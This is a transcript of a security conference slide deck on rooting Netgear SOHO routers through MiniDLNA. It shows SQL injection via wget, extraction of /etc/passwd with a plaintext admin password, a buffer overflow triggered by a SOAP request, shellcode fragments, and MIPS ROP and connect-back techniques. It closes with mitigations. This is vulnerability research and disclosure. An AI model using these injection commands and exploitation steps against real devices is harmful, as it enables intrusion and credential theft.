from sql injection to mips overflows · 2013-08-24 · what i’m going to talk about novel uses...
TRANSCRIPT
![Page 1: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/1.jpg)
From SQL Injection to MIPS OverflowsRooting SOHO Routers
Zachary Cutlip
![Page 2: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/2.jpg)
Tactical Network Solutions
Craig Heffner
Acknowledgements
![Page 3: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/3.jpg)
What I’m going to talk about
Novel uses of SQL injection
Buffer overflows on MIPS architecture
0-day Vulnerabilities in Netgear routers
Embedded device investigation process
Live demo: Root shell & more
Questions
![Page 4: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/4.jpg)
Read the paper
Lots of essential details
Not enough time in this talk to cover it all
Please read it
![Page 5: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/5.jpg)
Why attack SOHO routers?
Offers attacker privileged vantage point
Exposes multiple connected users to attack
Exposes all users’ Internet comms to snooping/manipulation
Often unauthorized side doors into enterprise networks
![Page 6: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/6.jpg)
Target device: Netgear WNDR3700 v3
Fancy-pants SOHO Wireless Router
DLNA Multimedia server
File server w/USB storage
![Page 7: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/7.jpg)
Very popular on Amazon
![Page 8: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/8.jpg)
Other affected devices
Netgear WNDR 3800
Netgear WNDR 4000
Netgear WNDR 4400
![Page 9: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/9.jpg)
First step: take it apart
![Page 10: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/10.jpg)
UART header
![Page 11: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/11.jpg)
UART to USB adapter
![Page 12: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/12.jpg)
USB port
Helps analysis
Retrieve SQLite DB
Load a debugger onto the router
![Page 13: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/13.jpg)
Analyzing the Device Software
Download firmware update from vendor, unpack
See Craig Heffner’s blog for more on firmware unpacking
http://www.devttys0.com/blog
![Page 14: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/14.jpg)
Linux--Woo hoo!
$ binwalk ./WNDR3700v3-V1.0.0.18_1.0.14.chk
DECIMAL HEX DESCRIPTION---------------------------------------------------86 0x56 LZMA compressed data1423782 0x15B9A6 Squashfs filesystem
$ dd if=WNDR3700v3-V1.0.0.18_1.0.14.chk of=kernel.7z bs=1 skip=86 count=1423696
$ p7zip -d kernel.7z
$ strings kernel | grep 'Linux version'Linux version 2.6.22 ([email protected]) (gcc version 4.2.3) #1 Wed Sep 14 10:38:51 CST 2011
![Page 15: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/15.jpg)
Target Application: MiniDLNA
![Page 16: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/16.jpg)
What is DLNA?
Digital Living Network Alliance
Interoperability between gadgets
Multimedia playback, etc.
But Most Importantly...
![Page 17: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/17.jpg)
Attack Surface
![Page 18: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/18.jpg)
Google reveals: open source!
![Page 19: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/19.jpg)
Source code analysis
‘strings’ reports shipping binary is 1.0.18
Download source for our version.
Search source for low-hanging fruit
![Page 20: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/20.jpg)
SQL injection: more than meets the eye
Privileged access to data
What if the data is not sensitive or valuable?
Opportunity to violate developer assumptions
You know what happens when you assume...
Your shit gets owned.
![Page 21: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/21.jpg)
Vulnerability 1: SQL injection
grep -rn SELECT * | grep ‘%s’
21 results, such as:
sprintf(sql_buf, "SELECT PATH from ALBUM_ART where ID = %s", object);
![Page 22: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/22.jpg)
Closer look
![Page 23: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/23.jpg)
Closer look
![Page 24: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/24.jpg)
Album art query
![Page 25: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/25.jpg)
Test the vulnerability
$ wget http://10.10.10.1:8200/AlbumArt/"1; INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES('31337','pwned');"-throwaway.jpg
![Page 26: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/26.jpg)
w00t! Success!
sqlite> select * from ALBUM_ART where ID=31337;31337|pwned
![Page 27: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/27.jpg)
Good news / Bad news
Working SQL injection
Trivial to exploit
No valuable information
Even if destroyed, DB is regenerated
![Page 28: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/28.jpg)
Vulnerability 2: Remote File Extraction
![Page 29: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/29.jpg)
sqlite> select * from ALBUM_ART;1 | /tmp/mnt/usb0/part1/ .ReadyDLNA//art_cache/tmp/shares/ USB_Storage/01 - Unforgivable (First State Remix).jpg
MiniDLNA Database:
![Page 30: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/30.jpg)
Test the Vulnerability$ wget http://10.10.10.1:8200/AlbumArt/"1;INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES('31337','/etc/passwd');"-throwaway.jpg
$ wget http://10.10.10.1:8200/AlbumArt/31337-18.jpg
![Page 31: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/31.jpg)
Passwords
$ cat 31337-18.jpgnobody:*:0:0:nobody:/:/bin/sh
admin:qw12QW!@:0:0:admin:/:/bin/sh
guest:guest:0:0:guest:/:/bin/sh
![Page 32: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/32.jpg)
admin:qw12QW!@:0:0:admin:/:/bin/sh
![Page 33: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/33.jpg)
Vulnerability 3: Remote Code Execution
![Page 34: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/34.jpg)
i.e., pop root
![Page 35: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/35.jpg)
Party like it’s 1996.
![Page 36: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/36.jpg)
$ find . -name \*.c -print | xargs grep -E \ 'sprintf\(|strcat\(|strcpy\(' | \ grep -v asprintf | wc -l265 <--OMG exploit city
![Page 37: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/37.jpg)
265 <--No, seriously. WTF.
![Page 38: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/38.jpg)
![Page 39: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/39.jpg)
![Page 40: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/40.jpg)
Left join
![Page 41: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/41.jpg)
Left join
![Page 42: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/42.jpg)
album_art in sprintf() is DETAILS.ALBUM_ART.
Schema shows it’s an INT.
sqlite> .schema DETAILSCREATE TABLE DETAILS ( ID INTEGER PRIMARY KEY AUTOINCREMENT, ..., ALBUM_ART INTEGER DEFAULT 0, ...);
![Page 43: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/43.jpg)
DETAILS.ALBUM_ART is an INT, but it can store arbitrary data
This is due to “type affinity”
callback() attempts to “validate” using atoi(), but this is busted
atoi(“1_omg_learn_to_c0d3”) == 1
ALBUM_ART need only start with a (non-zero) int
Weak sauce
Two things to note
![Page 44: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/44.jpg)
Exploitable buffer overflow?
We have full control over the DB from Vuln #1
We need to:
Stage shellcode in database
Trigger query of our staged data
![Page 45: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/45.jpg)
SQL injection limitation
Limited length of SQL injection, approx. 128 bytes per pass.
Target buffer is 512 bytes.
SQLite concatenation operator: “||”
UPDATE DETAILS set ALBUM_ART=ALBUM_ART|| “AAAA” where ID=3
![Page 46: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/46.jpg)
Trigger query of staged exploit
Model DLNA in Python
Python Coherence library
Capture conversation in Wireshark
Save SOAP request for playback with wget
![Page 47: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/47.jpg)
Wireshark capture
![Page 48: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/48.jpg)
SOAP request
![Page 49: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/49.jpg)
Things you need
Console access to the device
There is a UART header on the PCB
gdbserver cross-compiled for MIPS
gdb compiled for MIPS target architecture
![Page 50: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/50.jpg)
Test the vulnerabilityAttach gdbserver on the target to minidlna.exe
Connect local gdb to remote sesion
Use wget to SQL inject overflow data
Set up initial records in OBJECTS and DETAILS
Build up overflow data
Use wget to POST the SOAP request
How much overflow data?
![Page 51: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/51.jpg)
$ wget http://10.10.10.1:8200/ctl/ContentDir \ --header="Host: 10.10.10.1" \ --header=\ 'SOAPACTION: "urn:schemas-upnp-org:service:ContentDirectory:1#Browse"' \ --header='"content-type: text/xml ;charset="utf-8"' \ --header="connection: close" \ --post-file=./soaprequest.xml
Trigger the exploit
![Page 52: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/52.jpg)
w00t! Success!
![Page 53: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/53.jpg)
We control the horizontal and the vertical
We own the program counter, and therefore execution
Also all “S” registers: $S0-$S8
Useful for Return Oriented Programming exploit
![Page 54: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/54.jpg)
Owning $PC is great, but give me a shell
![Page 55: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/55.jpg)
Getting Execution: Challenges
Stack ASLR
MIPS Architecture idiosyncrasies
Return Oriented Programming is limited (but possible)
“Bad” Characters due to HTTP & SQL
![Page 56: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/56.jpg)
Getting Execution:Advantages
No ASLR for executable, heap, & libraries
Executable stack
![Page 57: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/57.jpg)
ROP on MIPS
All MIPS instructions are 4-bytes
All MIPS memory access must be 4-byte aligned
No jumping into the middle of instructions
![Page 58: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/58.jpg)
ROP on MIPS
We can return into useful instruction sequences:
Manipulate registers
Load $PC from registers or memory we control
Help locate stack, defeating ASLR
![Page 59: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/59.jpg)
Locate stack using ROP
Load several offsets from stack pointer into $S3,$S4,$S6
Load $S0 into $T9 and jump
![Page 60: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/60.jpg)
MIPS cache coherency
MIPS has two parallel caches:
Instruction Cache
Data Cache
Payload written to the stack as data
Resides in data cache until flushed
![Page 61: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/61.jpg)
MIPS Cache Coherency
Can’t execute off stack until cache is flushed
Write lots to memory, trigger flush?
Cache is often 32K-64K
Linux provides cacheflush() system call
ROP into it
![Page 62: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/62.jpg)
Bad characters
Common challenge with shellcode
Spaces break HTTP
Null bytes break strcpy()/sprintf()
SQLite also has bad characters
e.g., 0x0d, carriage return
SQLite escape to the rescue: “x’0d’”
![Page 63: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/63.jpg)
“\x7a\x69\xce\xe4\xff”,“x’0d’”,“\x3c\x0a\x0a\xad\x35”
![Page 64: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/64.jpg)
MIPS NOP is \x00\x00\x00\x00
Use some other inert instruction
I used:
nor t6,t6,zero
\x27\x70\xc0\x01
NOP Instruction
![Page 65: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/65.jpg)
Trouble with EncodersMetasploit payload + XOR Encoder==No Joy
Metasploit only provides one of each on MIPS
Caching problem?
Wrote my own NUL-safe connect-back payload
No need for encoder
Pro Tip: Avoid endianness problems by connecting back to 10.10.10.10
![Page 66: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/66.jpg)
Overflow diagram
![Page 67: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/67.jpg)
Demo Time
![Page 68: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/68.jpg)
How to suck less hardEstablish security requirements
Self protection
Network protection
Less crappy programming
sqlite3_snprintf()
Privilege separation
Mandatory Access Controls, e.g. SELinux
![Page 69: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/69.jpg)
Upshot
Developer assumes well-formed data
Compromise database integrity, violate developer assumptions
Even if the database is low value
![Page 71: From SQL Injection to MIPS Overflows · 2013-08-24 · What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in](https://reader034.vdocument.in/reader034/viewer/2022050408/5f85a204ca89b679f9639e4e/html5/thumbnails/71.jpg)
Questions?